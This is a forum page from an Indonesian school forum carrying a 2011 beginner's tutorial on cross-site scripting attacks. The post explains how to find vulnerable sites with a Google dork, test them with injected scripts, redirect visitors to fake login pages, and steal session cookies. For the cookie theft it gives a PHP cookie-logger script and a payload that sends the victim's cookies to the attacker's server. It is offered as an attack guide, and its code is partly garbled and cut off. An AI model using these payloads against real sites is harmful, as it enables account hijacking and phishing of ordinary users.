Smasa Jember 2011

Ayok Daftar Dulu
Let's Sign up

Join the forum, it's quick and easy

Smasa Jember 2011

Ayok Daftar Dulu
Let's Sign up

Smasa Jember 2011

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Smasa Jember 2011

Keywords

Latest topics

» wu,wu,wu,wu,wu
XSS Attack Buat Pemula EmptyTue Feb 21, 2012 5:06 pm by RRZA

» asik bangeet .
XSS Attack Buat Pemula EmptyWed Oct 19, 2011 4:33 pm by zull.zull

» engga tau apa yaa
XSS Attack Buat Pemula EmptyWed Oct 19, 2011 4:25 pm by zull.zull

» Download Harry Potter 1 & 2
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 11:06 pm by shelsa14

» 10 Fakta UNik Bill Gate
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 10:23 pm by shelsa14

» 10 KONSPIRASI BESAR DI SELURUH DUNIA
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 10:15 pm by shelsa14

» Cara Naikin ato Nurunin Reputasi
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 10:11 pm by shelsa14

» Linkin Park
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 10:01 pm by shelsa14

» 250 Fakta Unik dan Menarik Dunia !
XSS Attack Buat Pemula EmptyWed Aug 24, 2011 9:56 pm by shelsa14

June 2024

MonTueWedThuFriSatSun
     12
3456789
10111213141516
17181920212223
24252627282930

Calendar Calendar

Affiliates

free forum


    XSS Attack Buat Pemula

    gysu
    gysu
    Admin


    Jumlah posting : 61
    Points : 102
    Reputation : 6
    Join date : 17.07.11
    Age : 28
    Lokasi : Jember

    XSS Attack Buat Pemula Empty XSS Attack Buat Pemula

    Post  gysu Fri Aug 19, 2011 8:35 pm

    setelah saya bahas tentang sql injection sekarang saatnya beralih ke XSS attack
    apa itu XSS attack???
    baca sendiri Very Happy Very Happy

    Apa itu XSS?
    XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.




    Bagaimanakah menemukan Situs yang vulner?
    mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menggunakan bantuan sesepuh kita yang paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.hehehehe
    kita menggunakan Dork dengan query sebagai berikut:

    " inurl:"search.php?q=" "


    atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau Forum.


    Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
    Ok sekarang kita coba menginjeksi dengan kode :


    " alert("XSS") "


    maka jika menampilkan dialog box seperti ini maka site itu vulner :

    Tapi apakah sekedar itu saja?

    sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro?
    bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu.
    ok.
    dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
    Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.

    Adakah cara lain?
    metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri

    "




    dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
    atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :


    " window.open( "http://www.google.com/" ) "

    maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

    Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.

    Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

    Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
    Atau salin aja code dibawah ini :



    $c = $_GET['c'];
    $file = fopen(?Log.txt?,'a?);
    fwrite($file,$c);
    fclose($file);
    ?>



    Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
    masukan code ini

    " window.location = "http://server-lu.com/cookielogger.php?c="+document

      Waktu sekarang Sun Jun 30, 2024 3:49 pm